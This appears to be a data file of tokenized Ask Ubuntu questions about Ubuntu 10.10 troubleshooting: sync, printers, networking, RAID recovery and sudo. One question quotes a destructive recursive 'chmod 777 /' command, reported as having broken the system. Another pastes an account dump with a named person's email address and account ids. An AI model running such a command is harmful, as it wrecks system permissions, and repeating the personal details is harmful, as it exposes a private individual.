21897	ubuntu one preferences does not show usage , name , e-mail , current plan	ubuntuone is correctly synchronizing selected files between two computers running ubuntu 10.10 . when i open ubuntuone preferences , account tab , on one computer it does not display the usage , name e-mail or current plan . on the other computer all information is shown correctly . on the devices tab the 2 computers are not shown . they do show correctly on the other computer . any ideas on how to fix this problem . i have reinstalled ubuntuone per this link . i have installed gir1.0-soup2.4 and magicicada . i have downloaded watgui.py but i do n't know how to run it , do i need to put it in a certain directory ? ? with magicicada i can see traffic when i change a file . let me know what you would like to look at . i have run python watgui.py with the following results : `` username '' : `` https : //login.ubuntu.com/+id/c3b7hxg '' , '' openid '' : `` https : //login.ubuntu.com/+id/c3b7hxg '' , '' first_name '' : `` '' , '' last_name '' : `` james schurz '' , '' features '' : [ `` couch_storage '' , `` file_storage '' , `` notes_sync '' ] , '' couchdb '' : { `` host '' : `` https : //couchdb.one.ubuntu.com '' , `` root '' : `` https : //couchdb.one.ubuntu.com/u/a76/8a9/662864 '' , `` dbpath '' : `` u/a76/8a9/662864 '' } , '' couchdb_root '' : `` https : //couchdb.one.ubuntu.com/u/a76/8a9/662864 '' , '' email '' : `` pjschurz @ yahoo.com '' , '' current_plan '' : `` ubuntu one basic ( 2 gb ) \ntotal storage : 2 gb '' , '' nickname '' : `` james schurz '' , '' id '' : 662864 , '' subscription '' : { `` upgrade_available '' : true , `` description '' : `` ubuntu one basic ( 2 gb ) '' , `` upgrade_option '' : { `` upgrade_url '' : `` https : //one.ubuntu.com/account/subscription/591444/upgrade/662864/ '' , `` price '' : 2.9900000000000002 , `` description '' : `` 20-pack with 20 gb ( monthly ) '' , `` currency '' : `` usd '' , `` id '' : 591444 , `` name '' : `` 20-pack with 20 gb ( monthly ) '' } , `` trial '' : false , `` started '' : `` 2010-09-06t19:27:10z '' , `` is_paid '' : false , `` expires '' : null , `` qty '' : 1 , `` price '' : 0.0 , `` currency '' : `` usd '' , `` id '' : 591444 , `` name '' : `` ubuntu one basic ( 2 gb ) '' } reported out as a bug # 708902 .
21899	is it safe to install ubuntu natty daily build beside maverick ?	recently i decided to test natty , so i download it and try to install it on virtualbox ( v4.0 - 3d acceleration enabled ) but have problem in using unity ( it says to change my desktop to classic ... ) now i want to install it on my pc , so i came here to ask is it safe to do that ?
21902	run 64bit os in virtual box from 32bit ubuntu	is it possible to run windows 7 64 bit from a 32bit ubuntu os ? i can reinstall ubuntu as a 64bit os , but would prefer not to if it is not necessary .
21903	man pages offline for e-reader ?	is there anywhere one can get a copy of ubuntu 's man pages in e-reader ( preferably kindle/mobi , epub can be handled ) format ?
21910	how to configure ftp server ?	i am using ubuntu 10.04 as ftp server , when i upload file using filezilla client , i always got `` 550 permission denied '' . how to configure my server ?
21914	how can i make networkmanager ignore my wireless card ?	i do not want networkmanager to list or manipulate my wireless card . can i hide its interface from networkmanager somehow ? i have tried adding this in /etc/network/interfaces , iface wlan0 inet static address 192.168.1.101 netmask 255.255.255.0 gateway 192.168.1.1 wireless-essid synaptotagmin pre-up wpa_supplicant -b -i wlan0 -c /etc/wpa_supplicant.conf post-down killall -q wpa_supplicant and this in /etc/networkmanager/nm-system-settings.conf , [ main ] plugins=ifupdown , keyfile [ ifupdown ] managed=false [ keyfile ] unmanaged-devices=/org/freedesktop/hal/devices/net_00_19_e0_57_86_af but networkmanager applet still lists and allows me to connect to wireless networks .
21915	nonresponsive ui starting a few days ago ; no obvious resource shortage	the mouse stops and moves jerkily , and sometimes wo n't register clicks . gnome stopped responding a few hours ago -- everything looks fine , but no clicks on menu items do anything . i 've been running ubuntu 10.10 since it was released ; 8gb ram and a 60gb ssd . i have n't added any hardware or software recently except the ubuntu recommended updates ; the last thing was the bitcoin client a week ago . the mouse works on other computers , rebooting does nothing , top shows 3 cpu cores free and over a gig of ram left . i do n't know what else to look at .
21917	adding a canon pixma mx860 wireless printer ?	were do i go or click on to bring up system so i can follow the steps to add a wireless printer . a canon pixma mx860 ?
21923	how do i create the .xauthority file ?	i do n't have a .xauthority file in my home folder . i want to create it , please tell me the steps to do so in ubuntu 10.10 . thank you !
21924	how to make nautilus location bar editable ?	in thunar i could easily switch between vista-style graphical location bar and editable textual location bar ( which does n't look so eye-candy but is far more convenient for me ) . can i configure this in nautilus ?
21928	probability of trouble-free upgrade ?	one of the problems with recommending ubuntu to potential future users , especially those not particularly given to technical endeavours , is that there is a chance that upgrades will break their machine , and they 'll have to pay or otherwise coerce some knowledgeable person into fixing them . in my limited experience of running successive versions of ubuntu since 8-something on a couple of different laptops , this chance is quite high . i 'm not sure if i 'm just unlucky with the hardware that i 'm using , or if it 's a result of the higher-than-average number of packages i have installed , or if upgrades are just typically problematic . so i 'd like to know the likelihood , for a casual user , of doing a release upgrade , for example from 10.04 to 10.10 , without experiencing any regression bugs . obviously this is dependent on the hardware that people are running . canonical seems to be making some efforts towards collecting data on this , for example with the `` i am affected by this bug '' checkbox on their issue tracker , and with the laptop compatibility reports , but i 've not seen anything comprehensive . i 'm hoping for an objective reference here , for example a study carried out by relatively unbiased individuals . however , anecdotal evidence is probably useful too .
21929	wired and wireless network issues with pppoe	i have got this issue with ubuntu 10.10 . i have been with ubuntu 8.04 and then decided to try out ubuntu 10.10 . i booted with a livecd and was able to configure the wireless network painlessly using the livecd . so happily i installed ubuntu 10.10 . as soon as ubuntu came up it detected the wireless network and i was able to assign a static ip to eth1 ( i dont use dhcp option on my adsl router ) and enter a wap key and use pppoeconf to configure the dialer . the net was on and i was able to surf the net . all hunky dory so far . however on the next boot the fun started . it did not detect the wireless network . i could not see the network manager icon in the systray . i used ifconfig and saw that the entry for eth1 was missing . i used ifup eth1 and it said that eth1 was already up . then i installed wifi-radar . wifi-radar detected the wireless network . i configured wifi-radar for the detected wireless network , set the wap driver as wext and used the manual ip settings . however on clicking connect wifi-radar started looking for a dhcp ip , needless to say it failed . for the love of god i can not understand why wifi-radar is using dhcp when i have specified manual settings . next i decided to use the wired network to surf the net looking for a solution . so i plugged in the network cable from my modem , it detected the plugged in connection , i configured eth0 , used pppoeconf and connected to the net . then i foolishly decided to reboot my pc . and wonders of wonders , the same problem appeared . i can not see eth0 in my ifconfig anymore . i used pon to start the dsl-provider connection and it said something about network error or something . now my ifconfig shows only lo , both eth0 and eth1 have disappeared . can anybody help me on this ? is it a problem with ipv6 , if so how do you disable ipv6 on ubuntu 10.10 ? or is this is a known issue with ubuntu 10.10 ? p.s . i tried linux mint 10 and had the same issue . on rebooting wireless network was not getting detected . i have made myself the administrator so that there is no issue of rights or anything .
21931	error after sudo-ing `` sudo : must be setuid root ''	on a colleagues computer , everytime i use a sudo command , i get this error : sudo : must be setuid root i tried various things mentioned on the internet , like changing the permissions to 4755 from a live cd , but even this command from a live-cd sudo chmod 4755 /media/device/usr/bin/sudo gives the same error . edit : the colleague told me that he executed this command , god knows why : / sudo chmod -r 777 / or sudo chmod -r 777 he isnt exactly sure .
21934	how to change the binding of windows key which runs unity 's dash ?	currently , i am using the unity qt panel in my gnome desktop , and when i press the windows key , the unity 's dash launches , and i ca n't use any compiz based shortcuts . same behaviour is exhibited when i log in to unity 2d as well , as the windows key launches the dash . i have no desire to change my compiz shortcuts , so is there any way to change the keyboard mapping of unity 2d 's dash to something other or disable this shortcut completely ?
21935	why does `` additional drivers '' fail ?	when trying to activate , broadcom b43legacy wireless driver i get the following error , systemerror : installarchives ( ) failed . please help .
21939	disable pad click	i keep typing in the wrong place because of the pad getting touched while i am typing causing a click that re-place the cursor in another position . in windows , i can easily disable that so the pad is only used to move the mouse cursor , but i did n't find similar option in ubuntu . any help ?
21941	why ca n't i ping server ? vmware set to 'bridged ' loses ip address	i have installed a fresh 10.04 server onto a laptop on a home network as a vmware machine and set network connection to 'bridged : connect directly to the physical network ' from within vmware and rebooted the server . it then loses its ip address . dhclient eth0 says `` no working leases in persistent database - sleeping '' dhcp is working fine on the wi-fi router . the laptop is wired to a wireless router and from there wirelessly to a desktop . desktop and laptop can ping each other from windows . i can ping the vm from windows on the same laptop , but not from the desktop . strangely ping has started to resolve hostnames to ipv6 addresses and not ipv4 . do n't know whether that 's connected ? a kick in the right direction would be greatly appreciated . i 've been an ubuntu desktkop user for a few years , but new to ubuntu servers .
21942	are vala and desktopcouch ready ?	i have started writting rss reader in vala , but i do n't know , what database system should i use , i can not connect to couchdb and sqlite works fine , but i would like use couchdb because of ubuntu one . i have natty with latest updates public couchdb.session session ; public couchdb.database db ; public string feed_table = `` feed '' ; public string item_table = `` item '' ; public struct field { string name ; string val ; } // constructor public database ( ) { try { this.session = new couchdb.session ( ) ; } catch ( error e ) { stderr.printf ( `` % s a\n '' , e.message ) ; } try { this.db = new couchdb.database ( this.session , `` test '' ) ; } catch ( error e ) { stderr.printf ( `` % s a\n '' , e.message ) ; } try { this.session.get_database_info ( `` test '' ) ; } catch ( error e ) { stderr.printf ( `` % s aa\n '' , e.message ) ; } try { var newdoc = new couchdb.document ( ) ; newdoc.set_boolean_field ( `` awesome '' , true ) ; newdoc.set_string_field ( `` phone '' , `` 555-vala '' ) ; newdoc.set_double_field ( `` pi '' , 3.14159 ) ; newdoc.set_int_field ( `` meaning_of_life '' , 42 ) ; this.db.put_document ( newdoc ) ; // store document } catch ( error e ) { stderr.printf ( `` % s aaa\n '' , e.message ) ; } reports $ ./xml_parser rss.xmlcannot connect to destination ( 127.0.0.1 ) aa can not connect to destination ( 127.0.0.1 ) aaa
21948	syncing wm6 < - > evolution ... . opensync-module-python missing ?	i 'm trying to install opensync-plugin-synce to sync my wm6 phone with evolution , but when i try ( from synaptic , also with ap-get ) , is : depende : opensync-module-python but it is not installable in fact , i have n't found opensync-module-python in repositories . any hint ? is there any way to sync wm6 and evolution ( preferably without intermediate online syncs as gmail , for instance ) ? update : opensync-module-python exists in the repositories for previous versions of ubuntu ( mine is 10.10 ) ... . could i install it from there or would i ruin something ? update : should i mark this as impossible ? seems to be no way to sync wm6 phone with evolution right now ... .
21950	why ca n't i see others ' buzz posts in gwibber ?	i 've configured the built-in `` broadcast accounts '' feature ( which , as far as i understand , is gwibber ) with my google account for google buzz , but i do n't receive any updates ( despite there are plenty when i view buzz through gmail site ) . what am i doing wrong ?
21952	how to make empathy to support unicode names in jabber ?	if i use non-latin letters to name a jabber contact , then in chat windows ( and in contact list too after i restart ) they are displayed as & # nnn ; codes , not as letters i 've written . is this fixable ? can i configure empathy to use utf-8 for non-ascii characters in jabber ?
21953	how to customize the context menu in nautilus ?	from time to time i come to ideas of actions i 'd like to have available in a menu which pops up when i right-click on files in nautilus . how to add them there ? is there something like thunar uca plugin for nautilus ?
21960	dockbarx inside awn , preview window shifted on dual-screen after shifting from single-screen	i 've been running dockbarx in awn for sometime now . i started using dual-screens and started seeing a problem with the window preview . when i hover over the dockbarx icon to see the preview it appears on the other monitor . i 'm assuming that this is due to it still thinking there is only one monitor . i was hoping someone new of a gconf-editor setting that i could set with the rest of my screen that changes my laptop from internal monitor to my dual-screen setup . thanks in advance .
21961	can i virtualize a pre-installed windows 7 ?	i am considering buying a new computer with windows 7 ( 64-bit ) pre-installed . would it be possible to install ubuntu ( preferably 64-bit ) dual-boot on such a machine , and then , using virtualbox / vmware , etc . under ubuntu , make a virtual machine that `` points to '' the existing windows 7 os ( without making a copy of it ) ? just to be clear ... at the end of this process : i would have a machine that dual-booted both windows 7 ( 64-bit ) and ubuntu ( 64-bit ) . if i choose to boot ubuntu , i would then have the possibility of running a visualization of windows 7 within ubuntu . there would only be 1 copy of windows 7 on the hard disk .
21962	access officejet pro l7590 memory card reader	i ca n't manage to access my printer 's memory card reader in nautilus . i can just access it with hp-unload . here 's a sample output from this command : lubuntu @ l-x6 : ~ $ hp-unload hp : /net/officejet_pro_l7500 ? zc=hp065193 hp linux imaging and printing system ( ver . 3.10.6 ) photo card access utility ver . 3.3 copyright ( c ) 2001-9 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . using device : hp : /net/officejet_pro_l7500 ? zc=hp065193 |error : photo card write failed ( card may be write protected ) / photocard on device hp : /net/officejet_pro_l7500 ? zc=hp065193 mounted do not remove photo card until you exit this program warning : photo card is write protected . type 'help ' for a list of commands . type 'exit ' to quit . pcard : / > ls \ name size type dcim/ directory eos_digi.tal 0 b unknown/unknown 1 files , 0 b pcard : / > cd dcim |pcard : /dcim > ls | name size type . directory .. directory 100eos5d/ directory 267canon/ directory 270canon/ directory 271canon/ directory 272canon/ directory 0 files , 0 b pcard : /dcim > cd 272canon -pcard : /dcim/272canon > ls \ name size type . directory .. directory _mg_7201.jpg 3.1 mb image/jpeg ... ... ... .. ( some more files ) ... ... ... ... ... .. _mg_7281.jpg 2.5 mb image/jpeg _mg_7282.jpg 2.5 mb image/jpeg 82 files , 241.6 mb ( 253377883 ) how can i acess it from nautilus or mount it as a filesystem ? note that this is similar to this other question : ca n't get hp officejet 6500 card reader to work . but actually there seemed to be no supported device here , while in my case i manage to access the memory card from hp-unload . update : i have n't been able to point nautilus to smb : //192.168.68.35/memory_card , which is supposed to work , too . nautilus ca n't open it . update : nmblookup and smbclient results : lubuntu @ l-x6 : ~ $ nmblookup -i 192.168.85.77 -s \* querying 192.168.85.77 on 127.255.255.255 querying 192.168.85.77 on 192.168.85.255 name_query failed to find name 192.168.85.77 querying * on 127.255.255.255 192.168.85.76 * < 00 > looking up status of 192.168.85.76 l-x6 < 00 > - b < active > l-x6 < 03 > - b < active > l-x6 < 20 > - b < active > workgroup < 1e > - < group > b < active > workgroup < 00 > - < group > b < active > mac address = 00-00-00-00-00-00 192.168.85.77 ( the printer ) did not report anything lubuntu @ l-x6 : ~ $ smbclient -l 192.168.85.77 enter lubuntu 's password : domain= [ workgroup ] os= [ threadx ] server= [ nq 4.22 ] sharename type comment -- -- -- -- - -- -- -- -- -- - error returning browse list : errdos - errnoaccess ( access denied . ) domain= [ workgroup ] os= [ threadx ] server= [ nq 4.22 ] server comment -- -- -- -- - -- -- -- - workgroup master -- -- -- -- - -- -- -- -
21966	problem using scirra construct with wine	please see the video . when i try to use construct 's sprite editor , why does the black screen appear ? i can not choose another color , only black . how to fix this problem with wine ?
21967	where is my grub loader	i have recently installed ubuntu 10.10 desktop on my samsung n210 netbook from a usb . everything installed fine but now the grub menu does n't appear and it boots straight onto windows 7 with no grub menu for a ubuntu option
21970	will we be able to change the launcher icons ?	for example , if i use faenza icon set , will the launcher icons change to faenza ?
21971	is there an ssh connection manager ?	is there an app ( or gnomepanel plugin ) that allows to store ssh connection information and open terminal on click ? i know that nautilus does that using ubuntu 's `` password and encryption keys '' , but is there such a thing for a terminal ?
21973	when will fglrx work on latest xorg server 1.9 ?	as many laptops with an ati radeon ( 5470hd ) in it , mine is having issues too when installing the proprietary driver fglrx ( screen hangs on startup ) . i read somewhere that these issues appear because the latest fglrx driver does n't support the latest xorg server 1.9 yet , which is installed on ubuntu 10.10 . so my question is whether any of you know when ati will support the latest xorg server ?
21979	if i delete jolicloud in win7 can i reuse the 10gig partition ?	i have a dual boot sys : window 7 and jolicloud . if i delete jolicloud in win7 can i reuse the 10gig partition for ubuntu remix
21980	thunderbird is preferred mail app , messaging menu still loads evolution	hi , after installing ubuntu i setup my email in evolution , which is fine but on balance i prefer thunderbird so i installed and set that up . under preferred applications i have set the mail to thunderbird , but when i click on the icon in the top right ( the mail envelope ) and select mail it still loads evolution . is there a way to switch this to thunderbird ?
21981	how to sync ipod ratings and play counts to banshee ?	i 'm running ubuntu 10.10 , and my ipod is a touch 2g .
21985	default file permissions for php user www-data	i have a php installed on my ubuntu machine . the web root is /var/www i set the permissions for this folder like so : sudo chown -r ftpuser : www-data /var/www ftpuser is the user i set up so i can ftp to /var/www from another machine on the network . www-data is the user php uses . i double checked using whoami from php . whenever i ftp upload a new file to the machine the group has no permissions to the file . so when i try to access it in my browser via machine-name/new-file.php i am told permission denied and i have to go and chmod the new file . i am wondering if there is a way i can default the www-data user/group to have access permissions to new files so i do n't have to keep chmod every new file ?
21986	evolution has no access to couchdb	evolution gives the error `` can not open addressbook '' . `` we were unable to open this addressbook . this either means you have entered an incorrect uri , or the server is unreachable '' . `` details : operation not permitted '' . ( rough translation from dutch ) . enabling verbose logging in ( desktop ) couchdb tells me roughly the same : [ info ] [ < 0.7875.1 > ] 127.0.0.1 - - 'put ' /contacts/ 400 [ debug ] [ < 0.7875.1 > ] httpd 400 error response : { `` error '' : '' invalid_consumer '' , '' reason '' : '' invalid consumer ( key or signature method ) . '' } it seems that evolution tries to fetch the contacts , then couchdb denies access , and then evolution fails to do a proper oauth . this is on ubuntu 10.10 , with its default dektopcouch 1.0.1 . any hints on where to start would be most appreciated : )
21987	not enough components to start the raid array ?	i 'm trying to retrieve data from a `` western digital mybook world edition ( white light ) '' nas device . this is basically an embedded linux box with a 1tb hdd in it formatted in ext3 . it stopped booting one day for no apparent reason . i have extracted the hdd from the nas device and installed it in a desktop machine running ubuntu 10.10 in the hope of accessing the files on the drive . unfortunately , ubuntu has not been able to mount the drive automatically . having started up disk utility i see the drive as a multi disk device called `` array ( array ) '' showing metadata version 0.90.0 . the device state is : `` not running , not enough components to start '' . when i click the `` start raid array '' button i get an error saying : `` not enough components to start the raid array '' . can you please tell me which components are missing and how to install them to get access to the drive 's filesystem ?
21989	why ca n't ubuntu find an ext3 filesystem on my hard-drive ?	this question is related to this question : not enough components to start the raid array ? i 'm trying to retrieve data from a `` western digital mybook world edition ( white light ) '' nas device . this is basically an embedded linux box with a 1tb hdd in it formatted in ext3 . it stopped booting one day for no apparent reason . i have extracted the hdd from the nas device and installed it in a desktop machine running ubuntu 10.10 in the hope of accessing the files on the drive . i have followed instructions in this forum post , intended to mount the drive through terminal : http : //mybookworld.wikidot.com/forum/t-90514/how-to-recover-data-from-wd-my-book-world-edition-nas-device # post-976452 i have identified the partition that i want to mount and recover files from as /dev/sd4 by running `` fdisk -l '' and getting this : disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001cf00 device boot start end blocks id system /dev/sdb1 5 248 1959930 fd linux raid autodetect /dev/sdb2 249 280 257040 fd linux raid autodetect /dev/sdb3 281 403 987997+ fd linux raid autodetect /dev/sdb4 404 121601 973522935 fd linux raid autodetect// when i try to mount using : `` mount -t ext3 /dev/sdb4 /media/xyz '' i get the following error : mount : wrong fs type , bad option , bad superblock on /dev/sdb4 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so and `` dmesg | tail '' shows me : [ 15.184757 ] [ drm ] initialized nouveau 0.0.16 20090420 for 0000:01:00.0 on minor 0 [ 15.986859 ] [ drm ] nouveau 0000:01:00.0 : allocating fifo number 1 [ 15.988379 ] [ drm ] nouveau 0000:01:00.0 : nouveau_channel_alloc : initialised fifo 1 [ 16.353379 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 16.705944 ] tg3 0000:02:00.0 : eth0 : link is up at 100 mbps , full duplex [ 16.705951 ] tg3 0000:02:00.0 : eth0 : flow control is off for tx and off for rx [ 16.706102 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 19.125673 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 27.600012 ] eth0 : no ipv6 routers present [ 373.478031 ] ext3-fs ( sdb4 ) : error : ca n't find ext3 filesystem on dev sdb4 . i guess that last line is the punch line : ) why ca n't it find the ext3 filesystem on my drive ? what do i need to do to mount this partition and copy its contents ? does it have anything to do with the drive being part of a raid array ( see question mentioned above ) ? many thanks to any who can help .
22000	hotkey to shut down from login screen ?	i used to run 9.04 on my server and used to be able to use alt-t , alt-s to shut the system down from the login screen . it was using a kde login screen . now i 've upgraded to 10.04 and use the gnome login screen and i ca n't see any keyboard shortcuts to shutdown the server . is there a shortcut and if so , what is it ? further info - i would normally shut down the server without turning on the monitor , which was easy using the keyboard shortcuts . doing it with a mouse is not so easy without the monitor being on .
22003	laptop resumes from suspend while lid is closed	i have a dell studio 15 and i am running ubuntu 10.10 . when i close my lid or select the suspend option , the machine suspends as indicated by the slowly pulsing power indicator . i 'll put the machine in my bag and after a while it seems that the machine resumes , at least i think . when ever i go to get it , it 's overheated and the system can not resume . i am guessing that the processor resets in this overheat condition , but heat is still generated . this has happened about three times and i 'm getting worried that i 'll end up damaging the machine . how can i diagnose why the system is resuming from suspend ? can i force it to never resume from suspend if the lid is down ?
22004	ubuntu/windows xp - joint systems	i have a computer sectioned to run both ubuntu 10.10 and windows xp but as xp refuses to log in ( if i select xp the log in starts with the windows logo being shown on the screen for a few seconds before the screen goes blank and the page showing the option of selecting windows or ubuntu the re-appears ) , i would like to clear it completely from the system and just run ubuntu . can this be done , and if so , how do i proceed with doing it ?
22006	is there a way to create a hidden account ?	for privacy reasons i want to create an account that is invisible to other users ( even another administrator ) and can be only reached by directly typing the user name in . is that possible ?
22007	connectify-like functionality on intel 4965 agn wireless ?	i would like to use my laptop as an access point , so that i can connect my phones through wifi . i have done this my office laptop t410 . i am having t61 with wifi module 4965 . connectify on windows does not support it . i am following these instructions to make achieve wap capability on my t61 running ubuntu 10.10 . the link says something about `` master mode '' , how do i put my t61 wifi-inter4965 in master mode . can i install madwifi or atheros drivers on it ? i am using galaxy s froyo , and it does not support ad-hoc network . has anyone tried to achieve this ?
22011	laptop suspend appears broken , what must i roll back ?	question : what package contains the subprogram responsible for the kmenu option `` sleep '' ? background : i 've been running kubuntu 10.04.1 and i am completely updated . recently ( within the past month ) , the `` sleep '' menu item has stopped working . it just sits there waiting like i clicked nothing . i 've check all of the logs in /var/log and nothing is added when i click sleep . i 'm guessing that something i updated has bollux'ed things up , but i do n't know which package contains the component that i need to roll back . in the meantime , i 've installed uswsusp , but s2ram & s2both do n't ask my password when the laptop resumes -- which really bothers me . so now that i 've got a little time to track this down , i had to post -- any ideas ? ? update : i 've messed around with the versions of acpi for quite some time . it appears to be working . if i run sudo /etc/acpi/sleep.sh it works and the computer suspends . as above , it does not lock the screen first , but at least the damn thing suspends . oddly , sudo /etc/acpi/sleepbtn.sh does not work .
22013	how to enable ssh server in recovery mode ?	how to enable ssh server in ubuntu 10.10 desktop edition recovery mode ? my display is not working ( broken video card ) . so how can i do that `` blindly '' ? : )
22019	getting quickly to use gvim instead of gedit	how do i get quickly to use gvim ( or just vim in a terminal ) as its default text editor instead of gedit ? if this can be done , i must be doing it wrong ... ubuntu 10.10 amd64 .
22021	how to log cpu load ?	how to log cpu load to a file in order to investigate a problem ?
22031	what are my audio devices ?	i 'm attempting to use easycap to record from my camcorder but i 'm having a slight problem . using their test script i 'm able to get audio and video . i 've noticed that in the script on line 159 it makes a call to `` dev_aduio '' , which is reported as being `` plughw:2,0 '' . exactly what is this device ? is it located in /dev/ somewhere ? i 've done ls /dev/ and i ca n't find anything that would suggest an audio device
22034	ca n't install gimp-plugin-registry	i tried to install the ubuntu studio graphics meta-package , however it did n't install correctly.the package gimp-plugin-registry just won`t install , i tried the one in the software center and the one on the webup8 ppa neither package works . the following new packages will be installed : gimp-plugin-registry 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0b/1395kb of archives . after this operation , 3592kb of additional disk space will be used . ( reading database ... 402557 files and directories currently installed . ) unpacking gimp-plugin-registry ( from ... /gimp-plugin-registry_3.2-1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/gimp-plugin-registry_3.2-1_i386.deb ( - -unpack ) : trying to overwrite '/usr/lib/gimp/2.0/plug-ins/file-xmc ' , which is also in package gimp 2.7.3-2010110501~mm dpkg-deb : subprocess paste killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/gimp-plugin-registry_3.2-1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
22037	aliases not available when using sudo	i was playing around with aliases today and i noticed that aliases do n't seem to be available whilst using sudo : danny @ kaon : ~ $ alias alias egrep='egrep -- color=auto' alias fgrep='fgrep -- color=auto' alias grep='grep -- color=auto' alias l='ls -cf' alias la='ls -a' alias ll='ls -alf' alias ls='ls -- color=auto' danny @ kaon : ~ $ ll -d / drwxr-xr-x 23 root root 4096 2011-01-06 20:29 // danny @ kaon : ~ $ sudo -i root @ kaon : ~ # ll -d / drwxr-xr-x 23 root root 4096 2011-01-06 20:29 // root @ kaon : ~ # exit logout danny @ kaon : ~ $ sudo ll -d / sudo : ll : command not found is there any reason why you can not use aliases whilst using sudo ?
22042	would there be any negative side-effects of sharing /var/cache/apt/ between two systems ?	in the interest of conserving bandwidth , i 'm considering mounting a virtualbox host 's /var/cache/apt as /var/cache/apt in the guest . both host and guest are ubuntu 10.10 32-bit . would there be any negative consequences to doing this ? i 'm aware of the more robust solutions like apt-proxy , but i 'd prefer this simpler solution if it 's possible in order to spare the host the overhead of running extra services .
22048	/usr/lib/cups/backend/hp has failed with an hp laserjet p3005	ever since 10.04 , i ca n't print to an hp laserjet p3005 . i 'm even using an entirely different computer now with a fresh install of 10.10 . i 've tried with and without the latest hplip . recently , sometimes i can get it to print a few things , but eventually it always fails ( usually when printing a pdf from the document viewer ( also doesn't work with adobe pdf reader ) ) . sometimes it fails so bad the printer gives an error saying it needs to be turned off and on again . i ca n't seem to find a fix anywhere , i 've googled all over the past year and tried every fix i could find . it does say that the /usr/lib/cups/backend/hp has failed . it also does n't make a difference if i create the printer using hp-setup or ubuntu 's own printing control panel . i delete and re-create the printer , no difference eventually . i use the default printer settings or custom settings , no difference . i can print perfectly find to a networked printer at home - an hp officejet 6310 . it seems to be networked hp printers at work that i ca n't print to anymore ( except occasionally right after re-installing the printer driver ) . what 's the recommended way to install hp printer drivers and reset or clean out everything from before . or where are the right logs to read or debug commands to do to find out what may be the real cause of the printing problems ?
22049	how to control fan speed in dell inspiron 5010 ( 15r ) ?	how can i control fan speed on inspiron 15r ? i installed i8kutils as instructed on ubuntuforums but do n't know how to use it . fan makes quite a noise and runs all the time .
22054	how can i suspend using a keyboard shortcut , without administrator privileges ?	how can i set up a keyboard shortcut that i can use instead of clicking this menu item ? i have read about various terminal commands for suspending which i could easily assign to a keyboard shortcut , but all have required the use of sudo . i am looking for a solution that i can use on a system where i do not have administer privileges .
22055	how can i use unity 2d with another window manager besides metacity ?	how can i use unity 2d with another window manager besides metacity ? ( like openbox forexample )
22065	how do i export pages from browser with embedded hyperlinks ?	made a sad discovery today . i have ubuntu 10.04 lts . my client is in the ad business and she had a marketing competition task for me . she wanted me to visit websites of the competitors , and export the home pages as pdf . however , she wanted me to do so with embedded hyperlinks . as it turns out , firefox ( and even the latest chrome ) on ubuntu 10.04 lts do not embed hyperlinks in pdf web page exports . sure , there are several chrome and ff plugins that let you export as pdf , but what these do is connect to the url remotely , generate the pdf remotely , and then force a download in your browser to download it from a remote location . that 's not good for me , though , because some of these competitor pages require an initial login . that means that all i get back on the pdf printing from these ff or chrome plugins is a login page . is there a way to get around this problem , to fix the broken pdf printer on ubuntu 10.04 ?
22070	tortoisesvn ( subversion client ) ?	is there any software like tortoisesvn for subversion client that can be integrated with nautilus ?
22075	network does n't work after installing ubuntu 10.10 . is this a hardware failure ?	recently i installed ubuntu 10.10 on my dev box , making a dual boot with windows xp . before installation , everything worked fine , but now windows xp can not connect to the network saying that cable is not connected . i tried connecting it to different devices , and it always fails . under ubuntu i observe the same issue , but occasionally , usually it works and sometimes it ca n't find the network . do you people think it 's ubuntu related , or is my network card broken ?
22082	remove unused applications ?	i 'm running low on hard drive space and have been prompted to remove unused applications . is there a way to find unused applications/programs in ubuntu 10.4 . i have removed several applications in the software center . my concern is that with the ubuntu updates i will run out of space soon .
22090	my notebook wo n't boot into ubuntu	i 've been trying to install ubuntu on my samsung r510 notebook . it 's not working . there must be a hardware incompatibility , because every time i try to boot into the installer , the system will reboot after a short while . i tried to install the wubi version . same problem , but when i tried one of the other boot options , i got in and managed to install ubuntu . however , after that install , i never was able to boot into ubuntu again . same problem with the traditional route . i tried to boot up the live cd . no luck . a nice ubuntu screen , then auto reboot . so , the answer must be in the boot options . i know this thing must be posible , but i need help figuring out which options to set . anybody got any ideas ? because i 've been raising some serious steam from google , and do n't seem to find any useful information anymore . and i really need to ditch windows .
22091	how can i prevent the deletion of files in use ?	i have opened a spreadsheet in open office calc . i minimize the calc window and try to delete the file from the file system , i am able to delete . in windows when we try to delete an in use file we get a message saying the file is in use . please let me know how do i fix this ?
22092	remove languages in translations ?	i use spell-checker for 4 languages , en , de , fr , and lb . if i enable spellchecking and writing aids for en , de or fr in system - > administration - > language support there will be multiple versions of each language available , e.g . en , en_ca , en_gb , ... is there a possibility to select only one of those language versions while enabling the language , or removing the others afterwards . it would be enough to remove them from the selection menu . i would like to use the version which is equal to the country the language originally comes from : e.g . de_de , fr_fr , en_gb . for lb there is currently only lb_lu so there is no problem ( yet ) . instead of 4 languages i currently have around 20 , which is kind of annoying when switching the language ( which i do quite often ) . there might be a similar problem for the menu translations , where if i understand correctly you can choose the order in which translations are applied if they exist . any suggestions ?
22098	want to get numlock on at startup in kubuntu	i wanted to get the keyboard numlock on when starting the computer . to accomplish this i went to system settings - > input devices - > keyboard and in the section `` numlock on when kde starts '' checked `` turn on '' . but that is not lighting up the numlock at startup . what is the right place to accomplish this ?
22099	want to make an upstart script ; need help and advice	atm , i need to randomly start and stop ( for lack of a better word in my mind ) a job . i start it by typing java -jar foo.jar and to stop it find out its pid and kill it . killing it does n't cause any data loss or corruption or anything , just fyi . its tedious to do both these steps because the first command has to be executed from a particular directory , ie /usr/share/jetty ( the kill can be executed from anywhere ) . so i was thinking something on the lines of service foo start and service foo stop to start and stop services . is that possible , and more importantly correct ? is there any other solution ? thanks .
